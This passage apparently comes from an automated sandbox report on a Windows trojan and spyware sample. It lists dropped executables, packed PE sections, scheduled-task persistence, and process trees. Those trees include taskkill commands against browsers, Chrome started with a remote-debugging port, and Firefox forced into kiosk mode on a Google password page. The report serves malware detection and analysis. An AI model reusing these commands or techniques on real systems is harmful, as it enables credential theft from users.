FTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_183103f8-4
Drops large PE files
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File dump: service123.exe.12.dr 314617856 Jump to dropped file
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: a7f098a093.exe.6.dr Static PE information: section name:
Source: a7f098a093.exe.6.dr Static PE information: section name: .rsrc
Source: a7f098a093.exe.6.dr Static PE information: section name: .idata
Source: a7f098a093.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: e5e907fecb.exe.6.dr Static PE information: section name:
Source: e5e907fecb.exe.6.dr Static PE information: section name: .idata
Source: e5e907fecb.exe.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: 3996dc7402.exe.6.dr Static PE information: section name:
Source: 3996dc7402.exe.6.dr Static PE information: section name: .idata
Source: 3996dc7402.exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: 19cf1f0449.exe.6.dr Static PE information: section name:
Source: 19cf1f0449.exe.6.dr Static PE information: section name: .idata
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007BA050 7_2_007BA050
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007B8190 7_2_007B8190
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007C6030 7_2_007C6030
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007B1000 7_2_007B1000
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007C3D10 7_2_007C3D10
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007C89D0 7_2_007C89D0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007C8270 7_2_007C8270
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007BFE20 7_2_007BFE20
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007BDEF0 7_2_007BDEF0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007D6FF2 7_2_007D6FF2
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007C5780 7_2_007C5780
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007BA050 9_2_007BA050
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007C6030 9_2_007C6030
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007B1000 9_2_007B1000
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007C3D10 9_2_007C3D10
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007C89D0 9_2_007C89D0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007B8190 9_2_007B8190
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007C8270 9_2_007C8270
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007BFE20 9_2_007BFE20
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007BDEF0 9_2_007BDEF0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007D6FF2 9_2_007D6FF2
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007C5780 9_2_007C5780
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_0328F2F3 10_3_0328F2F3
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_0328F2F3 10_3_0328F2F3
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_03221B08 10_3_03221B08
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_0328F2F3 10_3_0328F2F3
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_0328F2F3 10_3_0328F2F3
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00439030 10_2_00439030
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0040E0D8 10_2_0040E0D8
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0043B8E0 10_2_0043B8E0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_004098F0 10_2_004098F0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00440C80 10_2_00440C80
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00423D70 10_2_00423D70
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00419530 10_2_00419530
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00441580 10_2_00441580
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_004089A0 10_2_004089A0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00428770 10_2_00428770
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0040CF05 10_2_0040CF05
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00421790 10_2_00421790
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00406840 10_2_00406840
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0043C040 10_2_0043C040
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00420870 10_2_00420870
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00406CC0 10_2_00406CC0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_004094D0 10_2_004094D0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0043F8D0 10_2_0043F8D0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_004324E0 10_2_004324E0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00405C90 10_2_00405C90
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00428CB0 10_2_00428CB0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0040E970 10_2_0040E970
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0040AD00 10_2_0040AD00
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_004341D0 10_2_004341D0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00403580 10_2_00403580
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_004061A0 10_2_004061A0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00420650 10_2_00420650
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0040B210 10_2_0040B210
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00409210 10_2_00409210
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00427E20 10_2_00427E20
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00404AC0 10_2_00404AC0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00425E90 10_2_00425E90
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0041FB60 10_2_0041FB60
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00440F60 10_2_00440F60
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0041DB30 10_2_0041DB30
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_004027D0 10_2_004027D0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_004077D0 10_2_004077D0
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00402B80 10_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0043C780 10_2_0043C780
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_004387B0 10_2_004387B0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: String function: 007CA5E0 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: String function: 007CD198 appears 36 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8144 -s 1564
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9982224965940054
Source: file.exe Static PE information: Section: ejhkawnv ZLIB complexity 0.9945648861761176
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982224965940054
Source: skotes.exe.0.dr Static PE information: Section: ejhkawnv ZLIB complexity 0.9945648861761176
Source: r5mqFEC[1].exe.6.dr Static PE information: Section: .coS ZLIB complexity 1.000337184446254
Source: r5mqFEC.exe.6.dr Static PE information: Section: .coS ZLIB complexity 1.000337184446254
Source: random[1].exe.6.dr Static PE information: Section: gdiujpci ZLIB complexity 0.994316652913318
Source: a7f098a093.exe.6.dr Static PE information: Section: gdiujpci ZLIB complexity 0.994316652913318
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.9993148053278689
Source: random[1].exe0.6.dr Static PE information: Section: ygcbzohu ZLIB complexity 0.9946352744919624
Source: e5e907fecb.exe.6.dr Static PE information: Section: ZLIB complexity 0.9993148053278689
Source: e5e907fecb.exe.6.dr Static PE information: Section: ygcbzohu ZLIB complexity 0.9946352744919624
Source: random[1].exe1.6.dr Static PE information: Section: jerbjqqv ZLIB complexity 0.9945139124773551
Source: 3996dc7402.exe.6.dr Static PE information: Section: jerbjqqv ZLIB complexity 0.9945139124773551
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@88/27@87/11
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00439030 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW, 10_2_00439030
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\r5mqFEC[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6724:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8144
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2588:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5124:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3444:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1712:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5052:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 3996dc7402.exe, 0000000E.00000002.3262037928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3257886939.000000001D6E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 3996dc7402.exe, 0000000E.00000002.3262037928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3257886939.000000001D6E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 3996dc7402.exe, 0000000E.00000002.3262037928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3257886939.000000001D6E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 3996dc7402.exe, 0000000E.00000002.3262037928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3257886939.000000001D6E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 3996dc7402.exe, 0000000E.00000002.3262037928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3257886939.000000001D6E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 3996dc7402.exe, 0000000E.00000002.3262037928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3257886939.000000001D6E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 3996dc7402.exe, 0000000E.00000002.3262037928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3257886939.000000001D6E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: r5mqFEC.exe, 0000000A.00000003.2462137831.0000000005A56000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2497796609.0000000005A38000.00000004.00000800.00020000.00000000.sdmp, a7f098a093.exe, 0000000C.00000003.3480704186.0000000001611000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2858691252.00000000056D8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 3996dc7402.exe, 0000000E.00000002.3262037928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3257886939.000000001D6E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 3996dc7402.exe, 0000000E.00000002.3262037928.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3996dc7402.exe, 0000000E.00000002.3257886939.000000001D6E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe "C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe"
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Process created: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe "C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe"
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Process created: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe "C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe "C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe "C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe "C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe "C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe "C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe"
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2068,i,137062989363131379,3334334011690293707,262144 /prefetch:8
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe "C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2244 -prefMapHandle 2240 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {78dc1d96-0b76-4467-b815-40c13a0cb6b1} 6680 "\\.\pipe\gecko-crash-server-pipe.6680" 1d53a26dd10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4016 -parentBuildID 20230927232528 -prefsHandle 4128 -prefMapHandle 3956 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {001f3511-2f2e-4cf9-832b-7aa384c4ffa9} 6680 "\\.\pipe\gecko-crash-server-pipe.6680" 1d54c386410 rdd
